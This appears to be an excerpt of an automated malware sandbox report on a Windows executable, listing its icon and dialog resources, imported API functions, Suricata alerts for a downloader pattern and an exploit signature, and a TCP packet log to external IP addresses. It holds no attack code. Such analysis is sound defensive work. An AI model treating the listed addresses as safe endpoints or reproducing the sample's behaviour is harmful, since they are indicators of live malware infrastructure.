RT_ICON	0x79428	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.5835951940850277
RT_ICON	0x7e8b0	0x4c28	Device independent bitmap graphic, 128 x 256 x 8, image size 16384	English	United States	0.46250512925728354
RT_ICON	0x834d8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.5978979688238073
RT_ICON	0x87700	0x2d6f	PNG image data, 256 x 256, 8-bit colormap, non-interlaced	English	United States	0.9944114865445791
RT_ICON	0x8a470	0x2ca8	Device independent bitmap graphic, 96 x 192 x 8, image size 9216	English	United States	0.5530090972708187
RT_ICON	0x8d118	0x2868	Device independent bitmap graphic, 128 x 256 x 4, image size 8192	English	United States	0.31254833720030933
RT_ICON	0x8f980	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.6519709543568465
RT_ICON	0x91f28	0x1bc8	Device independent bitmap graphic, 72 x 144 x 8, image size 5184	English	United States	0.6259842519685039
RT_ICON	0x93af0	0x16e8	Device independent bitmap graphic, 96 x 192 x 4, image size 4608	English	United States	0.3922237380627558
RT_ICON	0x951d8	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4096	English	United States	0.68688293370945
RT_ICON	0x96800	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.7211538461538461
RT_ICON	0x978a8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304	English	United States	0.7316098081023454
RT_ICON	0x98750	0xde8	Device independent bitmap graphic, 72 x 144 x 4, image size 2592	English	United States	0.4393258426966292
RT_ICON	0x99538	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2048	English	United States	0.5041291291291291
RT_ICON	0x99fa0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.7872950819672131
RT_ICON	0x9a928	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024	English	United States	0.8375451263537906
RT_ICON	0x9b1d0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576	English	United States	0.875
RT_ICON	0x9b898	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.5682926829268292
RT_ICON	0x9bf00	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256	English	United States	0.7890173410404624
RT_ICON	0x9c468	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.8625886524822695
RT_ICON	0x9c8d0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.7204301075268817
RT_ICON	0x9cbb8	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States	0.805327868852459
RT_ICON	0x9cda0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.8040540540540541
RT_DIALOG	0x9cec8	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0x9cfe8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x9d108	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x9d1d0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x9d230	0x180	Targa image data - Map 32 x 1235 x 1 +1	English	United States	0.5442708333333334
RT_VERSION	0x9d3b0	0x260	data	English	United States	0.5263157894736842
RT_MANIFEST	0x9d610	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T10:19:19.577126+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	49713	443	192.168.2.5	108.167.181.251
2024-07-25T10:19:36.426172+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49722	20.12.23.50	192.168.2.5
2024-07-25T10:19:25.097389+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49714	80	192.168.2.5	193.122.6.168
2024-07-25T10:19:25.702498+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49716	443	192.168.2.5	188.114.97.3
2024-07-25T10:18:58.312180+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49706	20.12.23.50	192.168.2.5
2024-07-25T10:19:36.216211+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49723	443	192.168.2.5	188.114.97.3
2024-07-25T10:19:28.159918+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49717	80	192.168.2.5	193.122.6.168
2024-07-25T10:19:22.456763+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49714	80	192.168.2.5	193.122.6.168

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 10:19:18.845482111 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:18.845567942 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:18.845701933 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:18.854757071 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:18.854804993 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.405493975 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.405767918 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.453568935 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.453623056 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.453969002 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.454044104 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.456653118 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.504504919 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.577147007 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.577173948 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.577378035 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.577378035 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.577409029 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.577461004 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.595534086 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.595948935 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.666213036 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.666420937 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.668521881 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.668596029 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.670173883 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.670237064 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.685672045 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.685767889 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.755228043 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.755330086 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.757044077 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.757122993 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.759073019 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.759149075 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.761137009 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.761197090 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.762649059 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.762715101 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.764270067 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.764607906 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.774987936 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.775054932 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.775652885 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.775719881 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.846199036 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.846415043 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.848009109 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.848088026 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.849652052 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.849736929 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.851667881 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.851742983 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.853194952 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.853272915 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.854867935 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.854947090 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.856060028 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.856138945 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.857166052 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.857244968 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.858660936 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.858731031 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.859267950 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.859328032 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.861105919 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.861167908 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.861773968 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.861835957 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.865170002 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.865252972 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.866425991 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.866494894 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:19.867703915 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:19.867779970 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:20.187467098 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:20.187480927 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:20.187632084 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:20.188894033 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:20.188965082 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:20.192646027 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:20.192725897 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:20.194349051 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:20.194432974 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:20.195911884 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:20.195980072 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:20.196253061 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:20.196306944 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:20.196316004 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:20.196330070 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:20.196357965 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:20.196403027 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:20.216162920 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:20.216193914 CEST	443	49713	108.167.181.251	192.168.2.5
Jul 25, 2024 10:19:20.216204882 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:20.216336012 CEST	49713	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:19:20.543797970 CEST	49714	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:20.548692942 CEST	80	49714	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:20.549432039 CEST	49714	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:20.549671888 CEST	49714	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:20.554689884 CEST	80	49714	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:21.213251114 CEST	80	49714	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:21.216943026 CEST	49714	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:21.222484112 CEST	80	49714	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:22.409809113 CEST	80	49714	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:22.456763029 CEST	49714	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:22.964247942 CEST	49715	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:22.964287996 CEST	443	49715	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:22.964343071 CEST	49715	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:22.965727091 CEST	49715	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:22.965739012 CEST	443	49715	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:23.432300091 CEST	443	49715	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:23.432383060 CEST	49715	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:23.439301968 CEST	49715	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:23.439320087 CEST	443	49715	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:23.439671040 CEST	443	49715	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:23.446965933 CEST	49715	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:23.488492966 CEST	443	49715	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:23.558007002 CEST	443	49715	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:23.558238029 CEST	443	49715	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:23.558307886 CEST	49715	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:23.563230991 CEST	49715	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:23.579241037 CEST	49714	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:23.584650040 CEST	80	49714	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:25.055377960 CEST	80	49714	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:25.060640097 CEST	49716	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:25.060689926 CEST	443	49716	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:25.060751915 CEST	49716	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:25.061043024 CEST	49716	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:25.061053991 CEST	443	49716	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:25.097388983 CEST	49714	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:25.551477909 CEST	443	49716	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:25.553234100 CEST	49716	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:25.553267002 CEST	443	49716	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:25.702529907 CEST	443	49716	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:25.702660084 CEST	443	49716	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:25.702742100 CEST	49716	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:25.703258991 CEST	49716	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:25.706837893 CEST	49714	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:25.708580971 CEST	49717	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:25.716506004 CEST	80	49717	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:25.716608047 CEST	49717	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:25.716675043 CEST	49717	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:25.717077971 CEST	80	49714	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:25.717125893 CEST	49714	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:25.724366903 CEST	80	49717	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:28.107654095 CEST	80	49717	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:28.109126091 CEST	49718	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:28.109205961 CEST	443	49718	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:28.109292030 CEST	49718	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:28.109608889 CEST	49718	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:28.109636068 CEST	443	49718	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:28.159918070 CEST	49717	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:28.594866991 CEST	443	49718	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:28.598249912 CEST	49718	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:28.598305941 CEST	443	49718	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:28.735493898 CEST	443	49718	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:28.735793114 CEST	443	49718	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:28.735905886 CEST	49718	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:28.736551046 CEST	49718	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:28.742079973 CEST	49719	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:28.747699976 CEST	80	49719	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:28.747813940 CEST	49719	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:28.747915030 CEST	49719	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:28.754535913 CEST	80	49719	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:32.096337080 CEST	80	49719	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:32.096575975 CEST	80	49719	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:32.096771002 CEST	49719	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:32.098016977 CEST	49720	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:32.098079920 CEST	443	49720	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:32.098176003 CEST	49720	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:32.098433018 CEST	49720	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:32.098465919 CEST	443	49720	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:32.592041016 CEST	443	49720	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:32.593662024 CEST	49720	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:32.593746901 CEST	443	49720	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:32.735052109 CEST	443	49720	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:32.735296011 CEST	443	49720	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:32.735379934 CEST	49720	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:32.735759974 CEST	49720	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:32.739218950 CEST	49719	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:32.740379095 CEST	49721	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:32.746032953 CEST	80	49719	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:32.746115923 CEST	49719	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:32.747929096 CEST	80	49721	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:32.748003006 CEST	49721	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:32.748121977 CEST	49721	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:32.753230095 CEST	80	49721	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:35.551037073 CEST	80	49721	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:35.552504063 CEST	49723	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:35.552553892 CEST	443	49723	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:35.552625895 CEST	49723	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:35.552932978 CEST	49723	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:35.552947998 CEST	443	49723	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:35.597395897 CEST	49721	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:36.083425045 CEST	443	49723	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:36.085129976 CEST	49723	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:36.085163116 CEST	443	49723	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:36.216289997 CEST	443	49723	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:36.216439962 CEST	443	49723	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:36.216502905 CEST	49723	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:36.217051983 CEST	49723	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:36.220468998 CEST	49721	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:36.221668005 CEST	49724	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:36.229744911 CEST	80	49724	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:36.229827881 CEST	49724	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:36.229909897 CEST	49724	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:36.230165005 CEST	80	49721	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:36.230211973 CEST	49721	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:36.236737967 CEST	80	49724	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:36.883203030 CEST	80	49724	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:36.884679079 CEST	49725	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:36.884752989 CEST	443	49725	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:36.884826899 CEST	49725	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:36.885097027 CEST	49725	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:36.885113955 CEST	443	49725	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:36.925594091 CEST	49724	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:37.386909008 CEST	443	49725	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:37.388691902 CEST	49725	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:37.388782978 CEST	443	49725	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:37.664309978 CEST	443	49725	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:37.664665937 CEST	443	49725	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:37.664748907 CEST	49725	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:37.665019989 CEST	49725	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:37.668299913 CEST	49724	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:37.669492006 CEST	49726	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:37.675277948 CEST	80	49724	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:37.675345898 CEST	49724	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:37.677102089 CEST	80	49726	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:37.677198887 CEST	49726	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:37.677248955 CEST	49726	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:37.685300112 CEST	80	49726	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:40.408366919 CEST	80	49726	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:40.427309036 CEST	49727	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:40.432656050 CEST	80	49727	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:40.432760000 CEST	49727	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:40.432826996 CEST	49727	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:40.437949896 CEST	80	49727	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:40.456811905 CEST	49726	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:41.104821920 CEST	80	49727	193.122.6.168	192.168.2.5
Jul 25, 2024 10:19:41.105493069 CEST	49726	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:19:41.106121063 CEST	49728	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:19:41.106177092 CEST	443	49728	188.114.97.3	192.168.2.5
Jul 25, 2024 10:19:41.106250048 CEST	49728	443	192.168.2.5	188.114.97.3
